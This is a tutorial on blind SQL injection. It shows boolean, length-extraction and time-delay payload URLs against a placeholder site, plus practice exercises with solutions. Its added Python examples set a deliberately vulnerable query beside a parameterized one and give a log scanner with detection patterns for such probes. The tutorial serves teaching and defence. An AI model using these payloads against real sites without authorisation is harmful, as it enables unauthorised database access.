Exploring blind SQL injection

A code injection technique that attackers can use to exploit vulnerabilities in a web application's database layer.

1. Introduction

In this tutorial, we'll explore the concept of blind SQL injection, a type of web application vulnerability that can allow an attacker to manipulate SQL queries and gain unauthorized access to a database.

You will learn:

  • The basics of blind SQL injection.
  • How to detect and exploit blind SQL injection vulnerabilities.
  • Measures to prevent blind SQL injection attacks.

Prerequisites: Basic understanding of SQL and web development concepts.

2. Step-by-Step Guide

Blind SQL injection is a type of SQL injection attack that asks the database true-or-false questions and determines the answer from the application's response. It is called "blind" because we are sending commands to the database without seeing the database output.

A. True and False Statements
Start by sending a true statement (e.g., 1=1) and a false statement (e.g., 1=2) to the database. If the response varies, it's a sign the site may be vulnerable to blind SQL injection.

B. Data Extraction
Once you've identified a potential vulnerability, you can extract data by asking a series of true/false questions via the SQL query.

C. Time Delays
You can also inject queries that cause deliberate delays, observing the response time to infer if a statement is true or false.

D. Countermeasures
Preventing blind SQL injection involves input validation, use of parameterized queries, and limiting database permissions.
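
The countermeasures above, as an added example (not code from the original tutorial): a deliberately vulnerable lookup beside a validated, parameterized one, checked with the true/false pair from section A. The table, data and function names are hypothetical, and an in-memory SQLite database stands in for the site's database.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data, held in memory only.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?)",
                   [(1, "Welcome"), (2, "Draft: internal"), (3, "Pricing")])
    return db

def lookup_vulnerable(db, raw_id):
    # Deliberately vulnerable: the request value becomes part of the SQL text,
    # so "1 or 1=1" is parsed as a condition instead of compared as a value.
    sql = "SELECT title FROM articles WHERE id = " + raw_id + " ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def lookup_safe(db, raw_id):
    # Input validation: accept only a short run of ASCII digits.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be an integer")
    # Parameterized query: the value is bound separately from the SQL text.
    sql = "SELECT title FROM articles WHERE id = ?"
    return [row[0] for row in db.execute(sql, (int(raw_id),))]

def response(lookup, db, raw_id):
    # Stand-in for what the client would see in the HTTP response.
    try:
        return "200 " + ", ".join(lookup(db, raw_id))
    except ValueError:
        return "400 bad request"

def has_boolean_oracle(lookup, db):
    # The true/false pair from the text: differing responses are the signal.
    return response(lookup, db, "1 or 1=1") != response(lookup, db, "1 or 1=2")

if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_vulnerable, lookup_safe):
        print(fn.__name__, "leaks a true/false signal:", has_boolean_oracle(fn, db))
```

The third countermeasure, limited database permissions, is a database-side setting and is not modelled here.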

3. Code Examples

Please note that these examples are for educational purposes only, and should not be used for malicious activities.

Example 1: Detecting Vulnerability

URL = 'http://site.com/page.php?id=1'
True statement = 'http://site.com/page.php?id=1 or 1=1'
False statement = 'http://site.com/page.php?id=1 or 1=2'

If the page loads correctly for the true statement and gives an error or different output with the false statement, it's a sign of vulnerability.

Example 2: Data Extraction

URL = 'http://site.com/page.php?id=1'
Length of database name = 'http://site.com/page.php?id=1 and length(database())>1'

You can increment the number until the response changes to find the exact length of the database name.

Example 3: Time Delays

URL = 'http://site.com/page.php?id=1'
Time delay = 'http://site.com/page.php?id=1 AND sleep(10)=0'

If the page takes 10 seconds longer to load, the statement is true.
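
From the defender's side, the three probe shapes in Examples 1 to 3 leave recognisable traces in web access logs. The following added example (not part of the original tutorial) scans constructed log lines for them and marks time-delay probes that coincide with a slow response. The log layout (client, request line, status, seconds taken), the rule names and the 5-second threshold are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines: client, request line, status, seconds taken.
SAMPLE_LOG = """\
203.0.113.7 "GET /page.php?id=1 HTTP/1.1" 200 0.04
203.0.113.7 "GET /page.php?id=1%20or%201=1 HTTP/1.1" 200 0.05
203.0.113.7 "GET /page.php?id=1%20or%201=2 HTTP/1.1" 200 0.05
203.0.113.7 "GET /page.php?id=1%20and%20length(database())>4 HTTP/1.1" 200 0.04
203.0.113.7 "GET /page.php?id=1%20AND%20sleep(10)=0 HTTP/1.1" 200 10.06
198.51.100.2 "GET /page.php?id=42 HTTP/1.1" 200 0.03
198.51.100.2 "GET /search.php?q=sleep+apnea HTTP/1.1" 200 0.06
"""

LINE = re.compile(r'(\S+) "GET (\S+) HTTP/[\d.]+" (\d{3}) ([\d.]+)')
RULES = {
    "boolean-probe": re.compile(r"\b(?:or|and)\s+\d+\s*=\s*\d+", re.I),
    "schema-length": re.compile(r"\blength\s*\(\s*database\s*\(", re.I),
    "time-delay": re.compile(r"\bsleep\s*\(\s*\d+", re.I),
}

def scan(log_text, slow_seconds=5.0):
    """Return (client, parameter, rule, slow) for each suspicious value."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, target, _status, took = m.groups()
        # parse_qsl percent-decodes, so %20 and + become spaces before matching.
        for name, value in parse_qsl(urlsplit(target).query):
            for rule, pattern in RULES.items():
                if pattern.search(value):
                    slow = float(took) >= slow_seconds
                    findings.append((client, name, rule, slow))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The ordinary search for "sleep apnea" is not flagged, because the time-delay rule requires a function call with a numeric argument.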

4. Summary

In this tutorial, we've covered the basics of blind SQL injection, how to detect and exploit vulnerabilities, and some countermeasures.

Next, learn more about other types of SQL injection, like time-based and out-of-band injections. Additional resources include:

5. Practice Exercises

Exercise 1: Try to detect if the following URL is vulnerable to blind SQL injection: http://site.com/login.php?username=admin

Exercise 2: Extract the length of the database name from a vulnerable site.

Exercise 3: Cause a delay of 5 seconds on a vulnerable site.

Solutions:

  1. Compare the responses from http://site.com/login.php?username=admin or 1=1 and http://site.com/login.php?username=admin or 1=2
  2. Use http://site.com/login.php?username=admin and length(database())>1, incrementing the number until the response changes.
  3. Use http://site.com/login.php?username=admin AND sleep(5)=0 and observe if the page takes 5 seconds longer to load.
